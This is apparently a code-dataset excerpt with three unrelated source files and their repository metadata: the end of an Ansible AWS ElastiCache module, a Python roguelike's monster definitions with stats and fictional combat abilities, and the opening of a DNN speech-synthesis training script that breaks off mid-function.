if state == 'present' and not num_nodes:
module.fail_json(msg="'num_nodes' is a required parameter. Please specify num_nodes > 0")
if not region:
module.fail_json(msg=str("Either region or AWS_REGION or EC2_REGION environment variable or boto config aws_region or ec2_region must be set."))
elasticache_manager = ElastiCacheManager(module, name, engine,
cache_engine_version, node_type,
num_nodes, cache_port,
parameter_group,
cache_subnet_group,
cache_security_groups,
security_group_ids, zone, wait,
hard_modify, region, **aws_connect_kwargs)
if state == 'present':
elasticache_manager.ensure_present()
elif state == 'absent':
elasticache_manager.ensure_absent()
elif state == 'rebooted':
elasticache_manager.ensure_rebooted()
facts_result = dict(changed=elasticache_manager.changed,
elasticache=elasticache_manager.get_info())
module.exit_json(**facts_result)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
|
ConZ27/ansible-modules-core
|
cloud/amazon/elasticache.py
|
Python
|
gpl-3.0
| 21,857
|
[
"Dalton"
] |
e7dba32494cf6a1c1ff0cc23c3ee2774475d2a861bb6ad27fe3ccebb72b69e87
|
from . import base
from .. import stats
from .. import items
from .. import dialogue
from .. import context
from .. import spells
from .. import invocations
from .. import effects
from .. import animobs
from .. import targetarea
from .. import aibrain
from . import animals
from . import treasuretype
from . import abilities
from .. import enchantments
# Contains critters that don't quite fit in anywhere else.
# *******************************
# *** ENCOUNTER LEVEL 1 ***
# *******************************
# *******************************
# *** ENCOUNTER LEVEL 2 ***
# *******************************
# *******************************
# *** ENCOUNTER LEVEL 3 ***
# *******************************
class EvilEye( base.Monster ):
name = "Evil Eye"
statline = { stats.STRENGTH: 6, stats.TOUGHNESS: 12, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 10, stats.PIETY: 10, stats.CHARISMA: 2, \
stats.MAGIC_ATTACK: 20, stats.MAGIC_DEFENSE: 10 }
SPRITENAME = "monster_default.png"
FRAME = 18
TEMPLATES = ()
MOVE_POINTS = 6
VOICE = None
HABITAT = ( context.HAB_CAVE, context.HAB_TUNNELS, context.SET_EVERY,
context.DES_LUNAR, context.MTY_BOSS,
context.MTY_BEAST, context.GEN_CHAOS )
ENC_LEVEL = 3
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_LUNAR,
skill_mod=stats.REFLEXES, hit_anim=animobs.PurpleExplosion, extra_effect =
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, on_success = (
effects.Paralyze( max_duration = 3 )
,) )
)
TECHNIQUES = ( invocations.MPInvocation( "Evil Gaze",
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, att_modifier=10, on_success = (
effects.Paralyze( max_duration = 3 )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=4), shot_anim=animobs.PurpleVortex,
ai_tar=invocations.TargetMobileEnemy(), mp_cost=3
), )
def init_monster( self ):
self.levels.append( base.Beast( 3, self ) )
# *******************************
# *** ENCOUNTER LEVEL 4 ***
# *******************************
class Cockatrice( base.Monster ):
name = "Cockatrice"
statline = { stats.STRENGTH: 8, stats.TOUGHNESS: 8, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 1, stats.PIETY: 10, stats.CHARISMA: 4 }
SPRITENAME = "monster_default.png"
FRAME = 21
TEMPLATES = ()
MOVE_POINTS = 10
VOICE = None
HABITAT = ( context.HAB_EVERY, context.SET_EVERY, context.SET_RENFAN,
context.DES_AIR, context.DES_EARTH,
context.MTY_BEAST, context.MTY_BOSS )
ENC_LEVEL = 4
COMPANIONS = (animals.Chicken,)
ATTACK = items.Attack( (1,6,0), element = stats.RESIST_PIERCING, skill_mod=stats.REFLEXES )
TECHNIQUES = ( invocations.MPInvocation( "Death Gaze",
effects.OpposedRoll( att_stat=stats.PIETY, att_modifier=-10, on_success = (
effects.InstaKill( anim=animobs.CriticalHit )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=4), shot_anim=animobs.PurpleVortex, ai_tar=invocations.TargetEnemy(), mp_cost=4
), )
def init_monster( self ):
self.levels.append( base.Beast( 3, self ) )
class CorpseEater( base.Monster ):
name = "Corpse Eater"
statline = { stats.STRENGTH: 12, stats.TOUGHNESS: 14, stats.REFLEXES: 8, \
stats.INTELLIGENCE: 2, stats.PIETY: 12, stats.CHARISMA: 2 }
SPRITENAME = "monster_default.png"
FRAME = 13
TEMPLATES = (stats.BUG,)
MOVE_POINTS = 8
VOICE = None
HABITAT = ( context.HAB_EVERY, context.HAB_TUNNELS, context.SET_EVERY,
context.MAP_DUNGEON,
context.DES_LUNAR,
context.MTY_BEAST )
ENC_LEVEL = 4
ATTACK = items.Attack( (3,4,0), element = stats.RESIST_PIERCING, extra_effect =
effects.OpposedRoll( att_stat=stats.TOUGHNESS, on_success = (
effects.Paralyze( max_duration = 6 )
,) )
)
TECHNIQUES = ( invocations.MPInvocation( "Tentacle Slime",
effects.TargetIsEnemy( on_true = (
effects.OpposedRoll( anim=animobs.GreenSplat, att_stat=stats.TOUGHNESS, on_success = (
effects.Paralyze( max_duration = 3 )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ),
)
), com_tar=targetarea.SelfCentered(radius=1,exclude_middle=True), ai_tar=invocations.TargetEnemy(), mp_cost=8 ), )
def init_monster( self ):
self.levels.append( base.Beast( 4, self ) )
# *******************************
# *** ENCOUNTER LEVEL 5 ***
# *******************************
class Gargoyle( base.Monster ):
name = "Gargoyle"
statline = { stats.STRENGTH: 15, stats.TOUGHNESS: 18, stats.REFLEXES: 14, \
stats.INTELLIGENCE: 6, stats.PIETY: 11, stats.CHARISMA: 7,
stats.RESIST_CRUSHING: 50, stats.RESIST_PIERCING: 50,
stats.RESIST_SLASHING: 50, stats.PHYSICAL_ATTACK: 10, stats.NATURAL_DEFENSE: 5 }
SPRITENAME = "monster_default.png"
FRAME = 22
TEMPLATES = (stats.EARTH,stats.ROCK)
MOVE_POINTS = 16
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MTY_BOSS,
context.MAP_DUNGEON, context.DES_EARTH )
ENC_LEVEL = 5
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_SLASHING )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Humanoid( 4, self ) )
# *******************************
# *** ENCOUNTER LEVEL 6 ***
# *******************************
class Basilisk( base.Monster ):
name = "Basilisk"
statline = { stats.STRENGTH: 15, stats.TOUGHNESS: 15, stats.REFLEXES: 8, \
stats.INTELLIGENCE: 2, stats.PIETY: 12, stats.CHARISMA: 11 }
SPRITENAME = "monster_default.png"
FRAME = 39
TEMPLATES = (stats.REPTILE,)
MOVE_POINTS = 8
VOICE = None
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MTY_BEAST, context.MTY_BOSS )
ENC_LEVEL = 6
ATTACK = items.Attack( (1,8,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Death Gaze",
effects.OpposedRoll( att_stat=stats.PIETY, att_modifier=-10, on_success = (
effects.InstaKill( anim=animobs.CriticalHit )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=4), shot_anim=animobs.PurpleVortex, ai_tar=invocations.TargetEnemy(), mp_cost=6
), )
def init_monster( self ):
self.levels.append( base.Beast( 6, self ) )
class Griffin( base.Monster ):
name = "Griffin"
statline = { stats.STRENGTH: 18, stats.TOUGHNESS: 16, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 5, stats.PIETY: 13, stats.CHARISMA: 8,
stats.PHYSICAL_ATTACK: 5, stats.NATURAL_DEFENSE: 5, stats.MAGIC_DEFENSE: 5 }
SPRITENAME = "monster_default.png"
FRAME = 35
TEMPLATES = ()
MOVE_POINTS = 12
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS, context.DES_AIR,
context.MTY_BEAST, context.GEN_NATURE )
ENC_LEVEL = 6
TREASURE = None
ATTACK = items.Attack( (2,6,0), element = stats.RESIST_SLASHING )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Beast( 7, self ) )
class Harpy( base.Monster ):
name = "Harpy"
statline = { stats.STRENGTH: 10, stats.TOUGHNESS: 10, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 7, stats.PIETY: 12, stats.CHARISMA: 17 }
SPRITENAME = "monster_default.png"
FRAME = 38
TEMPLATES = ()
MOVE_POINTS = 8
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.HAB_CAVE, context.SET_EVERY,
context.DES_LUNAR,
context.MTY_HUMANOID, context.MTY_BOSS, context.GEN_CHAOS )
ENC_LEVEL = 6
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_SLASHING )
TECHNIQUES = (invocations.MPInvocation( "Sleep Song",
effects.TargetIsEnemy( anim=animobs.SonicHit, on_true = (
effects.TargetIs( pat=effects.ANIMAL, on_true = (
effects.OpposedRoll( att_modifier=0, on_success = (
effects.CauseSleep(),
)),)
,), )), com_tar=targetarea.SelfCentered(radius=6,delay_from=-1),
ai_tar=invocations.TargetMobileEnemy(), mp_cost=8 ),
)
def init_monster( self ):
self.levels.append( base.Humanoid( 7, self ) )
class Owlbear( base.Monster ):
name = "Owlbear"
statline = { stats.STRENGTH: 21, stats.TOUGHNESS: 21, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 2, stats.PIETY: 12, stats.CHARISMA: 10 }
SPRITENAME = "monster_default.png"
FRAME = 27
TEMPLATES = ()
MOVE_POINTS = 10
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS,
context.MTY_BEAST, context.GEN_NATURE )
ENC_LEVEL = 6
TREASURE = None
ATTACK = items.Attack( (1,8,0), element = stats.RESIST_SLASHING )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Beast( 6, self ) )
# *******************************
# *** ENCOUNTER LEVEL 7 ***
# *******************************
class Lamia( base.Monster ):
name = "Lamia"
statline = { stats.STRENGTH: 18, stats.TOUGHNESS: 12, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 13, stats.PIETY: 15, stats.CHARISMA: 12 }
SPRITENAME = "monster_default.png"
FRAME = 2
TEMPLATES = ()
MOVE_POINTS = 10
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.HAB_DESERT, context.SET_EVERY,
context.DES_LUNAR,
context.MTY_HUMANOID, context.MTY_BOSS )
ENC_LEVEL = 7
TREASURE = treasuretype.HighItems()
ATTACK = items.Attack( (1,6,0), element = stats.RESIST_SLASHING, extra_effect=
effects.StatDamage( stats.PIETY, amount=4, anim=animobs.GreenBoom )
)
TECHNIQUES = ( invocations.MPInvocation( "Spirit Drain",
effects.TargetIsEnemy( on_true = (
effects.OpposedRoll( on_success = (
effects.ManaDamage( (1,8,0), stat_bonus=stats.TOUGHNESS, anim=animobs.PurpleExplosion ),
effects.CauseSleep()
,), on_failure = (
effects.ManaDamage( (1,8,0), stat_bonus=None, anim=animobs.PurpleExplosion )
,)),), on_false= (
effects.NoEffect( anim=animobs.PurpleExplosion )
,)), com_tar=targetarea.Cone(reach=4), ai_tar=invocations.TargetEnemy(), mp_cost=12
), )
def init_monster( self ):
self.levels.append( base.Humanoid( 8, self ) )
class Manticore( base.Monster ):
name = "Manticore"
statline = { stats.STRENGTH: 20, stats.TOUGHNESS: 19, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 7, stats.PIETY: 12, stats.CHARISMA: 9 }
SPRITENAME = "monster_default.png"
FRAME = 26
TEMPLATES = ()
MOVE_POINTS = 12
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS, context.MTY_BEAST, context.MTY_BOSS )
ENC_LEVEL = 7
COMBAT_AI = aibrain.ArcherAI()
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_PIERCING, extra_effect=abilities.POISON_ATTACK )
TECHNIQUES = (invocations.MPInvocation( "Tail Spikes",
effects.NoEffect( children=(
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
)),
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
) ),
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
) ),
effects.PhysicalAttackRoll( att_stat=stats.REFLEXES, att_modifier=5, on_success = (
effects.HealthDamage( (1,8,0), stat_bonus=stats.STRENGTH, element=stats.RESIST_PIERCING, anim=animobs.RedBoom ),
), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom ),
) ),
),), mp_cost=10, com_tar=targetarea.SingleTarget(reach=9), shot_anim=animobs.GoldStone, ai_tar=invocations.TargetEnemy()
),
)
def init_monster( self ):
self.levels.append( base.Beast( 6, self ) )
# *******************************
# *** ENCOUNTER LEVEL 8 ***
# *******************************
# Megaraptor
class Wyvern( base.Monster ):
name = "Wyvern"
statline = { stats.STRENGTH: 19, stats.TOUGHNESS: 15, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 6, stats.PIETY: 12, stats.CHARISMA: 9 }
SPRITENAME = "monster_default.png"
FRAME = 44
TEMPLATES = (stats.DRAGON,)
MOVE_POINTS = 10
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS,
context.MTY_BEAST, context.GEN_DRAGON )
ENC_LEVEL = 8
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,6,0), element = stats.RESIST_PIERCING,
extra_effect=abilities.POISON_ATTACK_1d8 )
TECHNIQUES = ()
def init_monster( self ):
self.levels.append( base.Terror( 8, self ) )
# *******************************
# *** ENCOUNTER LEVEL 9 ***
# *******************************
class Chimera( base.Monster ):
name = "Chimera"
# This is based on the version from the Pathfinder SRD rather than the
# regular SRD; the only difference is the beefed-up breath weapon.
statline = { stats.STRENGTH: 19, stats.TOUGHNESS: 17, stats.REFLEXES: 13, \
stats.INTELLIGENCE: 4, stats.PIETY: 13, stats.CHARISMA: 10,
stats.AWARENESS: 50 }
SPRITENAME = "monster_by_Joe.png"
FRAME = 0
TEMPLATES = ()
MOVE_POINTS = 12
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.SET_EVERY, context.DES_FIRE,
context.MTY_BEAST, context.GEN_CHAOS, context.MTY_BOSS )
ENC_LEVEL = 9
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (2,8,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Fire Breath",
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, on_success = (
effects.HealthDamage( (6,8,0), stat_bonus=stats.TOUGHNESS, element=stats.RESIST_FIRE, anim=animobs.RedCloud )
,), on_failure = (
effects.HealthDamage( (3,8,0), stat_bonus=None, element=stats.RESIST_FIRE, anim=animobs.RedCloud )
,) ), com_tar=targetarea.Cone(reach=4), ai_tar=invocations.TargetEnemy(), mp_cost=16
), )
def init_monster( self ):
self.levels.append( base.Terror( 9, self ) )
class Medusa( base.Monster ):
name = "Medusa"
statline = { stats.STRENGTH: 10, stats.TOUGHNESS: 12, stats.REFLEXES: 15, \
stats.INTELLIGENCE: 12, stats.PIETY: 13, stats.CHARISMA: 15 }
SPRITENAME = "monster_default.png"
FRAME = 30
TEMPLATES = ()
MOVE_POINTS = 10
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MTY_HUMANOID )
ENC_LEVEL = 9
COMBAT_AI = aibrain.ArcherAI(approach_allies=0,technique_chance=75)
ATTACK = items.Attack( (1,6,0), element = stats.RESIST_PIERCING, extra_effect=abilities.POISON_ATTACK_2d6 )
TECHNIQUES = ( invocations.MPInvocation( "Death Gaze",
effects.OpposedRoll( att_stat=stats.PIETY, att_modifier=-10, on_success = (
effects.InstaKill( anim=animobs.CriticalHit )
,), on_failure = (
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(reach=6), shot_anim=animobs.PurpleVortex, ai_tar=invocations.TargetEnemy(), mp_cost=9
), abilities.LONGBOW )
def init_monster( self ):
self.levels.append( base.Humanoid( 6, self ) )
class Umbull( base.Monster ):
name = "Umbull"
statline = { stats.STRENGTH: 23, stats.TOUGHNESS: 19, stats.REFLEXES: 13, \
stats.INTELLIGENCE: 9, stats.PIETY: 11, stats.CHARISMA: 13 }
SPRITENAME = "monster_default.png"
FRAME = 4
TEMPLATES = ()
MOVE_POINTS = 8
HABITAT = ( context.HAB_CAVE, context.SET_EVERY,
context.MAP_DUNGEON, context.DES_EARTH )
ENC_LEVEL = 9
COMBAT_AI = aibrain.BruiserAI()
TREASURE = treasuretype.Standard()
ATTACK = items.Attack( (3,6,0), element = stats.RESIST_SLASHING )
TECHNIQUES = (invocations.Invocation( "Freezing Gaze",
effects.OpposedRoll( att_modifier=20, on_success = (
effects.Paralyze( max_duration = 6 )
,), on_failure =(
effects.NoEffect( anim=animobs.SmallBoom )
,) ), com_tar=targetarea.SingleTarget(), shot_anim=animobs.PurpleVortex,
ai_tar=invocations.TargetMobileEnemy() ),
)
def init_monster( self ):
self.levels.append( base.Defender( 9, self ) )
# ********************************
# *** ENCOUNTER LEVEL 10 ***
# ********************************
class Sphinx( base.Monster ):
name = "Sphinx"
statline = { stats.STRENGTH: 19, stats.TOUGHNESS: 13, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 18, stats.PIETY: 19, stats.CHARISMA: 19, \
stats.NATURAL_DEFENSE: 15 }
SPRITENAME = "monster_default.png"
FRAME = 37
TEMPLATES = ()
MOVE_POINTS = 12
VOICE = dialogue.voice.GREEK
HABITAT = ( context.HAB_DESERT, context.SET_EVERY,
context.MAP_WILDERNESS,
context.DES_SOLAR,
context.MTY_HUMANOID, context.MTY_LEADER, context.MTY_BOSS )
ENC_LEVEL = 10
TREASURE = treasuretype.High()
ATTACK = items.Attack( (2,6,4), element = stats.RESIST_SLASHING )
TECHNIQUES = ( spells.lunarspells.DEATH_RAY, spells.airspells.DISPEL_MAGIC,
spells.priestspells.SANCTUARY, spells.solarspells.REMOVE_CURSE,
spells.solarspells.MASS_CURE )
def init_monster( self ):
self.levels.append( base.Terror( 8, self ) )
class Behir( base.Monster ):
name = "Behir"
statline = { stats.STRENGTH: 26, stats.TOUGHNESS: 21, stats.REFLEXES: 13, \
stats.INTELLIGENCE: 7, stats.PIETY: 14, stats.CHARISMA: 12, \
stats.RESIST_LIGHTNING: 150, stats.AWARENESS: 50, stats.CRITICAL_HIT: 10 }
SPRITENAME = "monster_by_Joe.png"
FRAME = 5
TEMPLATES = ()
MOVE_POINTS = 12
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_DUNGEON,
context.DES_AIR,
context.MTY_BOSS )
ENC_LEVEL = 10
TREASURE = treasuretype.Swallowed(scale=1,swag_chance=20)
ATTACK = items.Attack( (2,4,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Lightning Breath",
effects.OpposedRoll( att_stat=stats.REFLEXES, def_stat=stats.REFLEXES, on_success = (
effects.HealthDamage( (7,6,0), stat_bonus=None, element=stats.RESIST_LIGHTNING, anim=animobs.Spark )
,), on_failure = (
effects.HealthDamage( (3,7,0), stat_bonus=None, element=stats.RESIST_LIGHTNING, anim=animobs.Spark )
,) ), com_tar=targetarea.Line(reach=5), ai_tar=invocations.TargetEnemy(), mp_cost=30
), )
def init_monster( self ):
self.levels.append( base.Terror( 9, self ) )
# ********************************
# *** ENCOUNTER LEVEL 11 ***
# ********************************
class Hydra( base.Monster ):
name = "Hydra"
statline = { stats.STRENGTH: 21, stats.TOUGHNESS: 20, stats.REFLEXES: 12, \
stats.INTELLIGENCE: 3, stats.PIETY: 10, stats.CHARISMA: 9,
stats.PHYSICAL_ATTACK: 20 }
SPRITENAME = "monster_default.png"
FRAME = 3
TEMPLATES = (stats.REPTILE,stats.EARTH,)
MOVE_POINTS = 8
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.DES_EARTH, context.MTY_BOSS )
ENC_LEVEL = 11
VOICE = dialogue.voice.GREEK
COMBAT_AI = aibrain.BruiserAI()
TREASURE = treasuretype.Low()
ATTACK = items.Attack( (2,10,0), element = stats.RESIST_PIERCING )
TECHNIQUES = ( invocations.MPInvocation( "Poison Breath",
effects.OpposedRoll( def_stat=stats.TOUGHNESS, on_success = (
effects.HealthDamage( (3,6,0), stat_bonus=stats.TOUGHNESS, element=stats.RESIST_POISON, anim=animobs.PoisonCloud ),
effects.TargetIs( effects.ALIVE, on_true=( effects.OpposedRoll( att_stat=None, def_stat=stats.TOUGHNESS, on_success = (
effects.Enchant( enchantments.PoisonClassic )
,) ), ))
), on_failure = (
effects.HealthDamage( (2,6,0), stat_bonus=None, element=stats.RESIST_POISON, anim=animobs.PoisonCloud )
,) ), com_tar=targetarea.Blast(radius=2), ai_tar=invocations.TargetEnemy(min_distance=3), mp_cost=20, shot_anim=animobs.GreenComet
), )
def init_monster( self ):
self.levels.append( base.Terror( 10, self ) )
self.condition.append( enchantments.PermaMegaRegeneration() )
# ********************************
# *** ENCOUNTER LEVEL 12 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 13 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 14 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 15 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 16 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 17 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 18 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 19 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 20 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 21 ***
# ********************************
# ********************************
# *** ENCOUNTER LEVEL 22 ***
# ********************************
class Kaiju( base.Monster ):
name = "Kaiju"
statline = { stats.STRENGTH: 45, stats.TOUGHNESS: 35, stats.REFLEXES: 16, \
stats.INTELLIGENCE: 3, stats.PIETY: 14, stats.CHARISMA: 14, stats.RESIST_ATOMIC: 50,
stats.RESIST_FIRE: 200, stats.RESIST_POISON: 200, stats.RESIST_LUNAR: 200 }
SPRITENAME = "monster_default.png"
FRAME = 14
TEMPLATES = ()
MOVE_POINTS = 8
HABITAT = ( context.HAB_EVERY, context.SET_EVERY,
context.MAP_WILDERNESS,
context.MTY_BEAST )
ENC_LEVEL = 22
VOICE = dialogue.voice.DRACONIAN
COMBAT_AI = aibrain.BruiserAI()
TREASURE = None
ATTACK = items.Attack( (4,8,0), element = stats.RESIST_CRUSHING )
TECHNIQUES = ( invocations.MPInvocation( "Atomic Breath",
effects.OpposedRoll( att_stat=stats.REFLEXES, on_success = (
effects.HealthDamage( (10,6,0), stat_bonus=stats.TOUGHNESS, element=stats.RESIST_ATOMIC, anim=animobs.Nuclear )
,), on_failure = (
effects.HealthDamage( (3,10,0), stat_bonus=None, element=stats.RESIST_ATOMIC, anim=animobs.Nuclear )
,) ), com_tar=targetarea.Cone(reach=8), ai_tar=invocations.TargetEnemy(), mp_cost=60
), )
def init_monster( self ):
self.levels.append( base.Beast( 48, self ) )
self.condition.append( enchantments.PermaMegaRegeneration() )
| jwvhewitt/dmeternal | old_game/monsters/misc.py | Python | gpl-2.0 | 23825 | ["BLAST"] | 5fcc74082b819b1c0afe9a6efe8460254395f2b22695c00ee64560929389a40d |
import pickle
import gzip
import os, sys, errno
import time
import math
# numpy & theano imports need to be done in this order (only for some numpy installations, not sure why)
import numpy
#import gnumpy as gnp
# we need to explicitly import this in some cases, not sure why this doesn't get imported with numpy itself
import numpy.distutils.__config__
# and only after that can we import theano
#import theano
from utils.providers import ListDataProvider
from frontend.label_normalisation import HTSLabelNormalisation, XMLLabelNormalisation
from frontend.silence_remover import SilenceRemover
from frontend.silence_remover import trim_silence
from frontend.min_max_norm import MinMaxNormalisation
from frontend.acoustic_composition import AcousticComposition
from frontend.parameter_generation import ParameterGeneration
from frontend.mean_variance_norm import MeanVarianceNorm
# the new class for label composition and normalisation
from frontend.label_composer import LabelComposer
#from frontend.mlpg_fast import MLParameterGenerationFast
#from frontend.mlpg_fast_layer import MLParameterGenerationFastLayer
import configuration
from models.dnn_cm import DNN
from utils.compute_distortion import DistortionComputation, IndividualDistortionComp
from utils.generate import generate_wav
from utils.learn_rates import ExpDecreaseLearningRate
from io_funcs.binary_io import BinaryIOCollection
#import matplotlib.pyplot as plt
# our custom logging class that can also plot
#from logplot.logging_plotting import LoggerPlotter, MultipleTimeSeriesPlot, SingleWeightMatrixPlot
from logplot.logging_plotting import LoggerPlotter, MultipleSeriesPlot, SingleWeightMatrixPlot
import logging # as logging
import logging.config
import io
def extract_file_id_list(file_list):
file_id_list = []
for file_name in file_list:
file_id = os.path.basename(os.path.splitext(file_name)[0])
file_id_list.append(file_id)
return file_id_list
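# Illustrative example of the function above:
# extract_file_id_list(['/data/lab/arctic_a0001.lab']) would return ['arctic_a0001'].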
def read_file_list(file_name):
logger = logging.getLogger("read_file_list")
file_lists = []
fid = open(file_name)
for line in fid.readlines():
line = line.strip()
if len(line) < 1:
continue
file_lists.append(line)
fid.close()
logger.debug('Read file list from %s' % file_name)
return file_lists
def make_output_file_list(out_dir, in_file_lists):
out_file_lists = []
for in_file_name in in_file_lists:
file_id = os.path.basename(in_file_name)
out_file_name = out_dir + '/' + file_id
out_file_lists.append(out_file_name)
return out_file_lists
def prepare_file_path_list(file_id_list, file_dir, file_extension, new_dir_switch=True):
if not os.path.exists(file_dir) and new_dir_switch:
os.makedirs(file_dir)
file_name_list = []
for file_id in file_id_list:
file_name = file_dir + '/' + file_id + file_extension
file_name_list.append(file_name)
return file_name_list
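# Illustrative example of the function above:
# prepare_file_path_list(['arctic_a0001'], '/data/cmp', '.cmp') would return ['/data/cmp/arctic_a0001.cmp'],
# creating /data/cmp first if it does not already exist.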
def visualize_dnn(dnn):
layer_num = len(dnn.params) ## including input and output
plotlogger = logging.getLogger("plotting")
for i in range(layer_num):
fig_name = 'Activation weights W' + str(i) + '_' + dnn.params[i].name
fig_title = 'Activation weights of W' + str(i)
xlabel = 'Neuron index of hidden layer ' + str(i)
ylabel = 'Neuron index of hidden layer ' + str(i+1)
if i == 0:
xlabel = 'Input feature index'
if i == layer_num-1:
ylabel = 'Output feature index'
aa = dnn.params[i].get_value(borrow=True).T
print(aa.shape, aa.size)
if aa.size > aa.shape[0]:
plotlogger.create_plot(fig_name, SingleWeightMatrixPlot)
plotlogger.add_plot_point(fig_name, fig_name, dnn.params[i].get_value(borrow=True).T)
plotlogger.save_plot(fig_name, title=fig_name, xlabel=xlabel, ylabel=ylabel)
def load_covariance(var_file_dict, out_dimension_dict):
var = {}
io_funcs = BinaryIOCollection()
for feature_name in list(var_file_dict.keys()):
var_values, dimension = io_funcs.load_binary_file_frame(var_file_dict[feature_name], 1)
var_values = numpy.reshape(var_values, (out_dimension_dict[feature_name], 1))
var[feature_name] = var_values
return var
def train_DNN(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False, var_dict=None,
cmp_mean_vector = None, cmp_std_vector = None, init_dnn_model_file = None):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layer_size = hyper_params['hidden_layer_size']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
model_type = hyper_params['model_type']
hidden_layer_type = hyper_params['hidden_layer_type']
## use a switch to turn on pretraining
## pretraining may not help much; if that is the case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
sequential_training = hyper_params['sequential_training']
# sequential_training = True
buffer_size = int(buffer_size / batch_size) * batch_size
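# The line above rounds buffer_size down to a whole multiple of batch_size,
# e.g. buffer_size=100000 with batch_size=256 becomes 99840 (390 full batches).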
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProvider(x_file_list = train_x_file_list, y_file_list = train_y_file_list,
